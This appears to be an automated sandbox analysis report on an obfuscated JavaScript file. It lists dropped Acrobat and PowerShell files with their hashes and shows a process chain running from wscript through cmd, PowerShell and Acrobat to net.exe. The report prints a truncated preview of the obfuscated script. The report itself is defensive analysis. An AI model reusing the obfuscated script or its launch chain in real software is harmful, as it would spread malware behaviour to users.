SHA-512: | B56E9A082B12267BE16E6D5659C3E3D16079BEDA1EA83FF95DDF8D68B6EE5542612A8959140C87500342C621C8448736057FA41BDA7F0BF90E8C8CC5D255F672 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.3061517270303655 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXc5UEPpvdXnWsGiIPEeOF0YrQUoAvJfYdPeUkwRe9:YvXKX/evgsdTeOknGg8Ukee9 |
MD5: | BA2FCA950B6451293E15E3909CD964F4 |
SHA1: | BDB3CA73A1C54FEDCBAD6066CEDF4E5198D9DB4B |
SHA-256: | 9EFB0C76B60A58C5E4E7E8EAF85826B165EFFED857382809B65D3C13BFCEC49D |
SHA-512: | BA2D95DA2485F8014707FA7E9079569D019EE49DB0450D982488BD20FECBAB9808E2874C15012426DA9008BE84033A8E8AC55576925D3D85494DA783AF8E1FC6 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 284 |
Entropy (8bit): | 5.292891758527052 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXc5UEPpvdXnWsGiIPEeOF0YrQUoAvJf+dPeUkwRe9:YvXKX/evgsdTeOknG28Ukee9 |
MD5: | 467184A3598DAF04FF18D0E6B65DDE3F |
SHA1: | 1D62B894BE4CF9C26565BD0EF14CF7B8BE13EC10 |
SHA-256: | C291BE43FDBA572D9B39C3C8690F104069844AA10FE7DB62A4D36C33BCAA973B |
SHA-512: | 1D07DBF1B0654ECA27FA6772E583EF05E35FBAEED2510BBBA98D6EE77DDE746F8FFCBC2C36E7FA975427EC81B4517675BCE7D0464D3E8480B72604862A6DAA35 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 291 |
Entropy (8bit): | 5.2896565447933686 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXc5UEPpvdXnWsGiIPEeOF0YrQUoAvJfbPtdPeUkwRe9:YvXKX/evgsdTeOknGDV8Ukee9 |
MD5: | B0B34A6183E435C61FC0B39937FDC0E4 |
SHA1: | FEDD02C527B43FF5725B2129AC548A86F8C3C97E |
SHA-256: | CBF57A1CC98D74745E60F04347CD1DFE8DEAB3F65CCCA2841DD5D8CCA6E2EAB1 |
SHA-512: | 5C10D021839BC7A6239EC637DF593CB084F0A3ECCA46AE0177695650C23009E3100A927866D4EF8FF9601FA89EC59ADD807DF59076B5FF9FF82C23DB8947C8E2 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 287 |
Entropy (8bit): | 5.294393146518368 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXc5UEPpvdXnWsGiIPEeOF0YrQUoAvJf21rPeUkwRe9:YvXKX/evgsdTeOknG+16Ukee9 |
MD5: | 97A82D96D316DD7B435B1D282F4372DF |
SHA1: | F93FFB6290B4F4E92DB97846311863D2E6ADC1CB |
SHA-256: | B679EB8AC422004D74F39CE7DF1FCF37078A7D1E31DA1C6D9B3F48C3C9AAE680 |
SHA-512: | 7C59925ED8CB53E81F98FC0B397C9A44542D45A43861421D3DC10580B74AD35503EA3A991EDBCD71A2C864A9994E0BBD73F74E6D409E1E8E119E62B7B6BB4EE9 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1090 |
Entropy (8bit): | 5.660859532276764 |
Encrypted: | false |
SSDEEP: | 24:Yv6X/KgmeOkYamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSU:YvVDecBgkDMUJUAh8cvMU |
MD5: | 34F742CC320D9CA0E19676BEDC03723C |
SHA1: | 92E147B56EF59CDA03FA160EE4F2F685287FE68B |
SHA-256: | 322BF531BD60C7DA71E60C604BEF0715DBFE0F4CEF09BB6FC3683FBA4A53557B |
SHA-512: | 643DE25B83BBAB06110CA0B5A83A490CF17DA2A68C065537D0EE4B8F50F100793C3EE1DD8DD41DE89FB64D3ABEE1834DDE257A3306638524116FA5D2147F4406 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 286 |
Entropy (8bit): | 5.270336540054728 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXc5UEPpvdXnWsGiIPEeOF0YrQUoAvJfshHHrPeUkwRe9:YvXKX/evgsdTeOknGUUUkee9 |
MD5: | F4B1B32E51F8E8AEF6CB76548D7A8501 |
SHA1: | 1731437DC18426171E56FA5E040D3E773551662A |
SHA-256: | C1CDA232B291E01F4E957BAB676682C1B894BF1A7BA8B0A5015C029AF84959B3 |
SHA-512: | 578206EB3311DA882430AC34276ED2E62C62E165176F36883F6E07127144380565CD3718374970955C9D9D3606EBF8C0D309BC8E725E1D466B9090FD0BB27DDA |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 282 |
Entropy (8bit): | 5.293649376697399 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXc5UEPpvdXnWsGiIPEeOF0YrQUoAvJTqgFCrPeUkwRe9:YvXKX/evgsdTeOknGTq16Ukee9 |
MD5: | 028AB7A3C6D64F0321B971B232AA1493 |
SHA1: | 1D7E605EF8A654EE5E0B0DA6C84FF13DC654E657 |
SHA-256: | F5FD2926860A6FF13FFCE1519CAB93B318BD0CCBFEAC7F874B7285495A9BDCB3 |
SHA-512: | 71848F39C6E721CD9A8CF15A747B518F739AE46B80609C58C1078C9BBADFA7A6F4104FB7A1B8F6D4A5EAF7A58BDB3C801AF824F2A6DB48F1EC40B82958CBFFF4 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4 |
Entropy (8bit): | 0.8112781244591328 |
Encrypted: | false |
SSDEEP: | 3:e:e |
MD5: | DC84B0D741E5BEAE8070013ADDCC8C28 |
SHA1: | 802F4A6A20CBF157AAF6C4E07E4301578D5936A2 |
SHA-256: | 81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06 |
SHA-512: | 65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2814 |
Entropy (8bit): | 5.1438062730753344 |
Encrypted: | false |
SSDEEP: | 24:YvJwa/qayo3JaQKuF0Bs6lNKE6Cez7fj0pOj0SJPU9R+S2i2LSJhCHCJtVuhxLB/:YNN+uOBlNg0pwC1rpoK+P+G9YM |
MD5: | 0BF555AC70B87CA5C52A3328316CDEC1 |
SHA1: | A68EA43799FA12C0EFFD6457BDA6256BAA56D70D |
SHA-256: | 21F2FB8EB87F9254853FF3B17FEF82D17C5F205947419E8C40E416E095B254A9 |
SHA-512: | BE5500482F8A9646FD71CC1930D8C66B72C81614D43573E1C5670C9EEF1EE04C0680ED5655615F2A6DB02D73D484C146553E431BE3907C82926C01CCDD6143AC |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 12288 |
Entropy (8bit): | 1.4532829608634432 |
Encrypted: | false |
SSDEEP: | 48:TGufl2GL7msCvrBd6dHtbGIbPe0K3+fDy2dsYlk:lNVmsw3SHtbDbPe0K3+fDZdA |
MD5: | 50CAD20BCA41BC1E9AC64E3F13E44C51 |
SHA1: | 2AD9B90E06CB64BC78E59519EC48B9FD368AE95F |
SHA-256: | A9240B9A701641E1CE0296B19E0AF94482CFACBCA27D2A1ED7CF1D16B70083D1 |
SHA-512: | CA001AE7304715762CB38A02F8CCBF350E5C49D99827357EB8F9A71499AD3DD015CDFAA21548FEED5E4DAD77859EC3B95CE0689ECD1A319D4D4080733B5637DB |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 1.959053923375856 |
Encrypted: | false |
SSDEEP: | 48:7MtrvrBd6dHtbGIbPe0K3+fDy2dsNxqFl2GL7msSB:743SHtbDbPe0K3+fDZdKKVmsSB |
MD5: | BCD9127AD5EB934FCAA4616012B508FE |
SHA1: | A7FE55CAD266F2EF02299AA97C2805CE0DD558AC |
SHA-256: | 1D00AA887C520E997ACB349D5E8FADB5AA8A2F925C6993605AC1BD3B6F42A3CE |
SHA-512: | B6A86D0150D2DBB82EDAA1A8EC188CE577ACC1F016C55428DC5CEA53E1AC38DAAA36C6E51898B013A7D8EEF5264F7248C1442EA6ED4C037326C905D031A99EAC |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 66726 |
Entropy (8bit): | 5.392739213842091 |
Encrypted: | false |
SSDEEP: | 768:RNOpblrU6TBH44ADKZEgjRu/STPrfD79uPnVemKC/nzFO9usYyu:6a6TZ44ADE9u/OPrfDg15O9xK |
MD5: | 263FE0AFF92EDE2D390FD80571096901 |
SHA1: | F48D606C0BAA8286A23AF4D7C7CA089DA47D2922 |
SHA-256: | A1F6B6543BE8F7AF1304632C6101B121A6F61B14929E6F55DA2094D96CC81244 |
SHA-512: | 063C51164D153AB3A23B8676A88A07467FBC24DC016916589A3ACA598054FD2E70C440511264B232381461D233E872D726A5F924204FC28D688923BF3330C447 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1940658735648508 |
Encrypted: | false |
SSDEEP: | 3:Nlllul3nqth:NllUa |
MD5: | 851531B4FD612B0BC7891B3F401A478F |
SHA1: | 483F0D1E71FB0F6EFF159AA96CC82422CF605FB3 |
SHA-256: | 383511F73A5CE9C50CD95B6321EFA51A8C6F18192BEEBBD532D4934E3BC1071F |
SHA-512: | A22D105E9F63872406FD271EF0A545BD76974C2674AEFF1B3256BCAC3C2128B9B8AA86B993A53BF87DBAC12ED8F00DCCAFD76E8BA431315B7953656A4CB4E931 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 246 |
Entropy (8bit): | 3.5162684137903053 |
Encrypted: | false |
SSDEEP: | 6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K88Cl+ylv:Qw946cPbiOxDlbYnuRKdh2v |
MD5: | 2FA7D310EBA10A68BED7CB93FFC6496A |
SHA1: | 4DE0C0447FC773914E730227628F565ADA65B095 |
SHA-256: | 68AC03C6ED36DDF93487357416B3ED7083506D958668E2590E26C1AFBA0A88A9 |
SHA-512: | 60F3E7689D014C1AB9CA1A7010D5C38824BEA163C7E96ECC192566902648E6982D00BFADE41B6404954B98A003A0D368DF2124A4DC0EBFE419D9C3CA4AD9196C |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-11 03-07-37-641.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16525 |
Entropy (8bit): | 5.386483451061953 |
Encrypted: | false |
SSDEEP: | 384:A2+jkjVj8jujXj+jPjghjKj0jLjmF/FRFO7t75NsXNsbNsgNssNsNNsaNsliNsTY:AXg5IqTS7Mh+oXChrYhFiQHXiz1W60ID |
MD5: | F49CA270724D610D1589E217EA78D6D1 |
SHA1: | 22D43D4BB9BDC1D1DEA734399D2D71E264AA3DD3 |
SHA-256: | D2FFBB2EF8FCE09991C2EFAA91B6784497E8C55845807468A3385CF6029A2F8D |
SHA-512: | 181B42465DE41E298329CBEB80181CBAB77CFD1701DBA31E61B2180B483BC35E2EFAFFA14C98F1ED0EDDE67F997EE4219C5318CE846BB0116A908FB2EAB61D29 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 15114 |
Entropy (8bit): | 5.373302981550222 |
Encrypted: | false |
SSDEEP: | 384:xMo1oYxAzszrWc8Tht37RzINN+FYyD4CFmFRLn7HqLkJcF+LzkX45+4pwSI9wZ53:I/w |
MD5: | D104228BC97921655880F1EF9B126357 |
SHA1: | 7EC48F07882090301626663923FF2F9629B21469 |
SHA-256: | 099CCD98C80C9FC7A92B049097EA76E2C48263E692B857A8C1FC29D00750E815 |
SHA-512: | 96CEE65CC8016AF9BE27201F20F05939D085726064E7409A9147DB28F7261B16A88E178E8D3727F304C43E965E6D544B7865F65C0967A9BFA23E3CDD6B40F4E4 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 35721 |
Entropy (8bit): | 5.411816930308563 |
Encrypted: | false |
SSDEEP: | 768:hRDD/ATOlQwlgR6RgRT4xk1Bh9+R6gRldy0+AyxkHBDgRh9gRg:hRDD/ATOlQwlgR6RgRT4xk1Bh9+R6gR2 |
MD5: | B15C37DC7CAE986902C7E1B19460BFAB |
SHA1: | 14AAD8E8DE9DF81188DA1D554FF53A3B48DF3FBF |
SHA-256: | D7492CE627EA7A169571C5442ABC19358E79A8D3BE8B2D6F0BBC4D62F070C2E6 |
SHA-512: | 82E6DDA0EEF64938E3D4F0327F6F2C05B59F6E1B38AC0AEA203DDF17634ECE6C98A88B21294889B5F0DA9BFCED515D989DCA9450F1DAFF7A537726C51585CF48 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 386528 |
Entropy (8bit): | 7.9736851559892425 |
Encrypted: | false |
SSDEEP: | 6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m |
MD5: | 5C48B0AD2FEF800949466AE872E1F1E2 |
SHA1: | 337D617AE142815EDDACB48484628C1F16692A2F |
SHA-256: | F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE |
SHA-512: | 44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1407294 |
Entropy (8bit): | 7.97605879016224 |
Encrypted: | false |
SSDEEP: | 24576:/xLtwYIGNPzWL07o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07tGZd:JJwZG5WLxB3mlind9i4ufFXpAXkrfUsb |
MD5: | D38CB76360DDA78820460E5C5F20061C |
SHA1: | F2B65831130B70F2A3DC345F70C4BEEDE9AB40E8 |
SHA-256: | 55E70B5D5F8BE28D648BCDFE7DEB02BF4BBE2F626D620D4D838E0FA4FBF45F8E |
SHA-512: | 5E31738169A6FE92062B0E582489DEEAC2FA1798965DED94EFA994965470A15B5095851701E4DF631C5EC4454913272F1156EC46B32DA782D3C0F9E490C129A1 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1419751 |
Entropy (8bit): | 7.976496077007677 |
Encrypted: | false |
SSDEEP: | 24576:/VR9WL07oLYIGNPHGZfPdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:tR9WLxLZGBGZn3mlind9i4ufFXpAXkru |
MD5: | 279EEA8D13BB9A8AD65584B4BE090698 |
SHA1: | 62F4EB38467B61D1F95687C706803EC35DD78ED2 |
SHA-256: | 36CA501E830D34A25840050B2E421846BD77955CEE1C041F40B7B2AE1332E83F |
SHA-512: | BE6FB0C3BAE7DA59421683A7AC649488A584517E238E3625F4218718F79A60AC2F5A97BF9327C423223C042F9CC4734133D0C657051B35B11FBD36B0B24972DB |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 758601 |
Entropy (8bit): | 7.98639316555857 |
Encrypted: | false |
SSDEEP: | 12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg |
MD5: | 3A49135134665364308390AC398006F1 |
SHA1: | 28EF4CE5690BF8A9E048AF7D30688120DAC6F126 |
SHA-256: | D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B |
SHA-512: | BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 635764 |
Entropy (8bit): | 7.929592005409041 |
Encrypted: | false |
SSDEEP: | 12288:+ZLfaHa9wphzjERQ/JTckor+EURE+AwAX75pfGJKsKca+e7lEjYQ:+ZyjgQRRor+lRJAwAXlpoKgQ76jYQ |
MD5: | 91A2AF9E2A61ABF7D9977999FBF9879E |
SHA1: | F6E4FA02DD15B27F74553FB1B220A4D2DF385267 |
SHA-256: | FC3518D746CDB3738DA976551795B9727619F41F89AC0641533126E2F69B969A |
SHA-512: | 8B27CC0E0E902ABB59735FF4FC67789C0F0F9A1BF3F619A7AFAEAAA13A9AFCF9C82F25596719A65EC15221EBAE16EF9701CDB48F372BBF1BE08CB568DBE41D7C |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 98682 |
Entropy (8bit): | 6.445287254681573 |
Encrypted: | false |
SSDEEP: | 1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L |
MD5: | 7113425405A05E110DC458BBF93F608A |
SHA1: | 88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF |
SHA-256: | 7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46 |
SHA-512: | 6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 737 |
Entropy (8bit): | 7.501268097735403 |
Encrypted: | false |
SSDEEP: | 12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa |
MD5: | 5274D23C3AB7C3D5A4F3F86D4249A545 |
SHA1: | 8A3778F5083169B281B610F2036E79AEA3020192 |
SHA-256: | 8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97 |
SHA-512: | FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 55 |
Entropy (8bit): | 4.306461250274409 |
Encrypted: | false |
SSDEEP: | 3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y |
MD5: | DCA83F08D448911A14C22EBCACC5AD57 |
SHA1: | 91270525521B7FE0D986DB19747F47D34B6318AD |
SHA-256: | 2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9 |
SHA-512: | 96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 4.889047016903056 |
TrID: | |
File name: | 2634817597621928878.js |
File size: | 23'556 bytes |
MD5: | 02462089b9b4d1cdcc3ffa628f288c4b |
SHA1: | 6fd729df96d7b6f7195f361bd78ec368863c91fa |
SHA256: | 5e663bef7d349556ef89eaff9debccf0f6055c55ed70bf3eb9ae25a58e8c6728 |
SHA512: | d44b773cc6f0e2e7591c5b860c22af0833decdccb329b5840f6a39a93e6b07a22ffb7f69180fe98e45a724230b592cdf457da126dd6e779d42ccd2649153cdf5 |
SSDEEP: | 384:NQL37UlX7EzlmDjYSlC4+6ORzyuEIB51uYdQGEI5clV8rB3WZlgj8UbJHq+vdGpU:CLrUh7SmD5lp+6ORzyuEIB51uYdQGEIV |
TLSH: | 50B2828CC6C4CE568ACC2DE812CF085A56D9C7DCC5CC44EF1C431244DBA6AF699FAAB5 |
File Content Preview: | function ceryw(){wqmxzx=[1031,3079,5127,4103,2055,3072];var mylrvx=this[tkhtouuec+fsjgei+iwfyief+yosdvk+japdc+ajecw+zrzmr+ulvfr](this[iiasscf+vlqlxl+jvrckujjh+iwfyief+ggakzubkx+tkhtouuec+ulvfr][jmwfu+iwfyief+japdc+fsjgei+ulvfr+japdc+apecon+wxowhe+nawhdn+j |
Icon Hash: | 68d69b8bb6aa9a86 |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 4 |
Start time: | 03:07:24 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6e7f00000 |
File size: | 170'496 bytes |
MD5 hash: | A47CBE969EA935BDD3AB568BB126BC80 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 6 |
Start time: | 03:07:25 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff764460000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 7 |
Start time: | 03:07:25 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7b4ee0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 8 |
Start time: | 03:07:26 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff741d30000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 11 |
Start time: | 03:07:32 |
Start date: | 11/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff702560000 |
File size: | 5'641'176 bytes |
MD5 hash: | 24EAD1C46A47022347DC0F05F6EFBB8C |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 12 |
Start time: | 03:07:33 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff764460000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 13 |
Start time: | 03:07:34 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\net.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6b45f0000 |
File size: | 59'904 bytes |
MD5 hash: | 0BD94A338EEA5A4E1F2830AE326E6D19 |
Has elevated privileges: | false |
Has administrator privileges: | false |
